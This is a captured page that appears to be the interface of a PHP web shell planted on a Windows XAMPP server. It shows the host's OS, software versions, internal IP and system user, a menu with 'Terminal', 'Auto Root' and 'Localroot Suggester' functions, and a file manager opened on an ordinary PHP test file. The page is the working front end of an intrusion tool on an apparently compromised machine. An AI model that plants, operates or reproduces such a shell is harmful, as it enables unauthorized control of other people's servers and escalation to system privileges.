Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
php /
tests /
parseDir /
Delete
Unzip
Name
Size
Permission
Date
Action
PHP5
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
extensions.php
401
B
-rw-rw-rw-
2016-01-27 12:02
phpinfo.php
19
B
-rw-rw-rw-
2016-01-27 12:02
Save
Rename
<?php xdebug_start_trace(); function test_extensions() { $image = imagecreate(320, 240); imageantialias($image, true); return $image; } print_r(apache_get_modules()); if (!extension_loaded('SQLite')) { $prefix = (PHP_SHLIB_SUFFIX === 'dll') ? 'php_' : ''; dl($prefix . 'sqlite.' . PHP_SHLIB_SUFFIX); echo 'SQLite version : ' . sqlite_libversion(); } xdebug_stop_trace(); ?>